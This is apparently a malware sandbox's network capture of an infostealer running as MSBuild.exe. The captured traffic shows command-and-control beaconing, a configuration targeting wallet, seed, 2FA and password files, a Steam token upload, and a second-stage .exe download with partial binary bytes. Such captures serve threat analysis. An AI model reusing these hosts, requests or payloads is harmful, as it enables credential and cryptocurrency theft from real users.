Oct 8, 2024 20:47:35.819539070 CEST	516	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDH Host: kasm.zubairgul.com Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="mode"4------DBKFHCFBGIIJKFHJDHDH--
Oct 8, 2024 20:47:36.645832062 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e 52 6a 4b 69 34 71 4c 43 70 69 61 58 52 6d 62 48 6c 6c 63 69 6f 75 4b 69 77 71 61 33 56 6a 62 32 6c 75 4b 69 34 71 4c 43 70 6f 64 57 39 69 61 53 6f 75 4b 69 77 71 63 47 39 73 62 32 35 70 5a 58 67 71 4c 69 6f 73 4b 6d 74 79 59 [TRUNCATED] Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0YnRjKi4qLCpiaXRmbHllciouKiwqa3Vjb2luKi4qLCpodW9iaSouKiwqcG9sb25pZXgqLiosKmtyYWtlbiouKiwqb2tleCouKiwqYmluYW5jZSouKiwqYml0ZmluZXgqLiosKmdkYXgqLiosKmV0aGVyZXVtKi4qLCpleG9kdXMqLiosKm1ldGFtYXNrKi4qLCpteWV0aGVyd2FsbGV0Ki4qLCplbGVjdHJ1bSouKiwqYml0Y29pbiouKiwqYmxvY2tjaGFpbiouKiwqY29pbm9taSouKiwqd29yZHMqLiosKm1ldGEqLiosKm1hc2sqLiosKmV0aCouKiwqcmVjb3ZlcnkqLip8MTUwfDN8KndpbmRvd3MqLCpQcm9ncmFtIEZpbGVzKiwqUHJvZ3JhbSBGaWxlcyAoeDg2KSosKkFwcERhdGEqLCpQcm9ncmFtRGF0YSosKi5sbmssKi5leGUsKi5zY3IsKi5jb20sKi5waWYsKi5tcDN8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl [TRUNCATED]
Oct 8, 2024 20:47:36.663289070 CEST	646	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFII Host: kasm.zubairgul.com Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 [TRUNCATED] Data Ascii: ------KKFBAAFCGIEGDHIEBFIIContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------KKFBAAFCGIEGDHIEBFIIContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------KKFBAAFCGIEGDHIEBFIIContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------KKFBAAFCGIEGDHIEBFIIContent-Disposition: form-data; name="file_data"FyTm9Q==------KKFBAAFCGIEGDHIEBFII--
Oct 8, 2024 20:47:37.262541056 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 8, 2024 20:47:37.305152893 CEST	188	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFI Host: kasm.zubairgul.com Content-Length: 114233 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 20:47:38.704828024 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 8, 2024 20:47:38.708663940 CEST	516	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBK Host: kasm.zubairgul.com Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="mode"5------GIJJKFCGDGHDHIECGCBK--
Oct 8, 2024 20:47:39.406672955 CEST	274	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 34 0d 0a 4d 54 49 34 4f 44 41 77 4f 48 78 6f 64 48 52 77 4f 69 38 76 62 6e 4e 6b 62 53 35 6a 64 57 31 77 59 58 49 74 59 58 56 30 62 79 31 76 63 6d 6c 6a 5a 53 31 30 61 58 41 75 63 6d 38 76 62 47 52 74 63 79 39 68 4e 44 4d 30 4f 44 59 78 4d 6a 67 7a 4e 44 63 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 64MTI4ODAwOHxodHRwOi8vbnNkbS5jdW1wYXItYXV0by1vcmljZS10aXAucm8vbGRtcy9hNDM0ODYxMjgzNDcuZXhlfDF8a2tra3w=0
Oct 8, 2024 20:47:40.930329084 CEST	684	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCG Host: kasm.zubairgul.com Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d [TRUNCATED] Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="mode"51------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="task_id"1288008------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="status"1------HDGCFHIDAKECFHIEBFCG--
Oct 8, 2024 20:47:41.855112076 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 8, 2024 20:47:42.078835964 CEST	516	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFI Host: kasm.zubairgul.com Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 2d 2d 0d 0a Data Ascii: ------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="mode"6------IJDBKKJKJEBFBGCBAAFI--
Oct 8, 2024 20:47:42.231462955 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 8, 2024 20:47:42.389008999 CEST	516	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFI Host: kasm.zubairgul.com Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 2d 2d 0d 0a Data Ascii: ------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="mode"6------IJDBKKJKJEBFBGCBAAFI--
Oct 8, 2024 20:47:42.469727039 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 8, 2024 20:47:43.105360985 CEST	168	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49875	147.45.44.104	80	4788	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 20:47:39.450573921 CEST	101	OUT	GET /ldms/a43486128347.exe HTTP/1.1 Host: nsdm.cumpar-auto-orice-tip.ro Cache-Control: no-cache
Oct 8, 2024 20:47:40.112802982 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:40 GMT Content-Type: application/octet-stream Content-Length: 568400 Last-Modified: Tue, 08 Oct 2024 18:45:00 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "67057dac-8ac50" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9e 58 fa 14 da 39 94 47 da 39 94 47 da 39 94 47 09 4b 97 46 d6 39 94 47 09 4b 91 46 76 39 94 47 09 4b 90 46 cf 39 94 47 ca bd 97 46 ce 39 94 47 ca bd 90 46 c8 39 94 47 09 4b 95 46 df 39 94 47 da 39 95 47 82 39 94 47 ca bd 91 46 94 39 94 47 92 bc 9d 46 db 39 94 47 92 bc 96 46 db 39 94 47 52 69 63 68 da 39 94 47 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ab 7d 05 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 29 00 2e 02 00 00 3e 06 00 00 00 00 00 f3 85 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 08 00 00 04 00 00 7e 7d 09 00 02 00 40 81 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$X9G9G9GKF9GKFv9GKF9GF9GF9GKF9G9G9GF9GF9GF9GRich9GPEL}g).>@@~}@<((&pt@@0.text-. `.rdatar@2@@.datayj@.reloctp>@B.rsrc\@@
Oct 8, 2024 20:47:40.112845898 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: YH?h<B%xYjjhZHZHCh<BxYVWjWYZHCjVZHCBHh<BwY_^ZHDZHg?h<BwYh<
Oct 8, 2024 20:47:40.112885952 CEST	1236	IN	Data Raw: e8 81 fe ff ff 8d 4d e0 e8 04 20 00 00 8b 4d 08 8b c6 8b 55 0c 89 4e 0c 8b 4d f8 c7 06 28 42 42 00 33 cd 89 56 10 5e e8 9f 6e 00 00 c9 c2 0c 00 56 8b f1 8d 46 04 c7 06 c4 41 42 00 50 e8 49 7e 00 00 f6 44 24 0c 01 59 74 0a 6a 14 56 e8 bc 6e 00 00 Data Ascii: M MUNM(BB3V^nVFABPI~D$YtjVnYY^U@B3D$EVL$PD$Puu:L$xL$4BB^3n]Vt$4BB^Vt$WV(BBFVGW_^
Oct 8, 2024 20:47:40.112921000 CEST	1236	IN	Data Raw: e8 35 6a 00 00 59 59 8b c6 5e c2 04 00 55 8b ec 83 ec 38 57 8b 7d 08 85 ff 74 3e 83 3f 00 75 39 56 6a 44 e8 e2 69 00 00 59 8b 4d 0c 8b f0 e8 e2 fd ff ff 50 8d 4d c8 e8 a2 fc ff ff 83 66 04 00 8b ce 50 c7 06 c4 43 42 00 e8 3a 00 00 00 8d 4d c8 89 Data Ascii: 5jYY^U8W}t>?u9VjDiYMPMfPCB:M7^jX_V~CBtvYvYhBB^UxESVWPUa}EP{ubYYjYj}Y{u_^[APt$o`fD$YYA
Oct 8, 2024 20:47:40.112957954 CEST	1236	IN	Data Raw: 20 0f b6 f0 8b c6 83 f0 12 50 e8 5b 0c 00 00 50 e8 ad 1f 00 00 8b 54 24 30 8a 44 34 34 59 8b 4c 24 24 30 04 0a 41 89 4c 24 24 3b 0f 7c 8e 8b 7c 24 28 8b 44 24 10 2b f8 83 e7 fc 57 50 e8 47 28 00 00 59 59 8b 8c 24 34 02 00 00 5f 5e 5b 33 cc e8 ce Data Ascii: P[PT$0D44YL$$0AL$$;\|\|$(D$+WPG(YY$4_^[3d]UMSVWB5Ez]vUMGUMfffjff^#f3FBfff#w(rXffff
Oct 8, 2024 20:47:40.112989902 CEST	1236	IN	Data Raw: 03 00 00 eb 14 66 f7 eb 66 43 66 f7 e6 66 81 ea 60 03 f7 e6 66 f7 ee 23 ce 66 0b de 0f b6 c0 c1 de 5b 66 f7 ef 66 f7 ea 4b 74 07 c1 d9 74 66 4e eb 0d c1 c7 64 66 c1 d3 f1 66 f7 ea c1 df 1f 66 81 c9 7b 02 23 db c1 c1 69 33 c2 66 c1 cf 6b 81 ce f7 Data Ascii: ffCff`f#f[ffKttfNdfff{#i3fkSfr[uJTO@fOfGfr$$sW0Uff'fi#ffffIfOfff-t6tLffff
Oct 8, 2024 20:47:40.113028049 CEST	1236	IN	Data Raw: eb 16 c1 d3 72 c1 c7 8f 66 42 66 c1 d3 86 66 f7 ee c1 c0 c0 66 c1 c2 05 81 c2 93 02 00 00 66 c1 cb 1c f7 e3 c1 ca 6d 72 09 66 f7 e7 66 c1 c6 df eb 0d 66 c1 d3 38 83 eb 2a 66 f7 e0 c1 c0 6a c1 de 4c 66 c1 ea fd 81 ce a3 00 00 00 66 81 ca ff 02 c1 Data Ascii: rfBffffmrfff8*fjLff`iswOffMffJfAffFw)tq#zfffDjfB%fOfH(f4fff#+f]uCwACxi
Oct 8, 2024 20:47:40.113102913 CEST	1236	IN	Data Raw: 75 0c 53 57 e8 46 09 00 00 8b 8c 24 84 00 00 00 83 c4 30 8b c3 5f 5e 5b 33 cc e8 88 56 00 00 8b e5 5d c2 18 00 55 8b ec 83 e4 f8 83 ec 3c a1 40 f0 42 00 33 c4 89 44 24 38 8b 45 08 53 56 57 89 44 24 20 8d 7c 24 24 33 c0 89 4c 24 1c 8b 4d 14 ab 89 Data Ascii: uSWF$0_^[3V]U<@B3D$8ESVWD$ \|$$3L$ML$q0d$4#D$8D$$;uYAVPS u\EQQ$\$D$f/BYYv5ED$PQQ$xt$1iuY
Oct 8, 2024 20:47:40.113136053 CEST	1236	IN	Data Raw: 8b 5d 08 8d 44 24 08 56 8b 75 14 57 ff 75 1c 8b f9 ff 76 14 68 a4 bb 42 00 50 57 e8 34 07 00 00 83 c4 10 50 8d 44 24 20 6a 40 50 e8 09 e0 ff ff 50 8d 44 24 2c 50 ff 75 18 56 ff 75 10 ff 75 0c 53 57 e8 34 04 00 00 8b 8c 24 8c 00 00 00 83 c4 30 8b Data Ascii: ]D$VuWuvhBPW4PD$ j@PPD$,PuVuuSW4$0_^[3vQ]UT@B3D$PS]D$VuWuvhBPWPD$ j@PPD$,PuVuuSW$0_^[3P]UL@B3D$HES
Oct 8, 2024 20:47:40.113169909 CEST	1236	IN	Data Raw: 3b c1 77 16 80 3c 3a 30 75 10 8a 4c 3a 01 80 f9 78 74 05 80 f9 58 75 02 8b f8 8b 43 30 8b 48 04 89 4c 24 18 8b 01 ff 50 04 8d 44 24 14 50 e8 f2 06 00 00 59 8d 4c 24 14 8b f0 e8 c5 e0 ff ff 6a 00 ff 74 24 10 8d 4c 24 2c e8 67 06 00 00 83 7c 24 38 Data Ascii: ;w<:0uL:xtXuC0HL$PD$PYL$jt$L$,g\|$8D$$L$GD$$PD$PQRC0HL$PD$PYL$t$kL$<QP\|$Pt$<Gt$<<tO~KL$PD$<t8\$~,+;s!t$+L$(jS
Oct 8, 2024 20:47:40.119744062 CEST	1236	IN	Data Raw: 10 77 11 89 41 10 83 79 14 0f 76 02 8b 09 c6 04 01 00 eb 0d ff 74 24 08 2b 41 10 50 e8 46 01 00 00 c2 08 00 ff 74 24 0c ff 74 24 0c ff 74 24 0c e8 d8 57 00 00 8b 44 24 10 83 c4 0c c3 56 8b f1 c7 06 2c 50 42 00 e8 1d 00 00 00 f6 44 24 08 01 c7 06 Data Ascii: wAyvt$+APFt$t$t$WD$V,PBD$hBBtjVHYY^VvEv=v5^VNtt$nu^UUSWO;r\G]+;w6GvV+4AQVP<ESPV\

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49749	149.154.167.99	443	4788	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:47:18 UTC	89	OUT	GET /maslengdsa HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
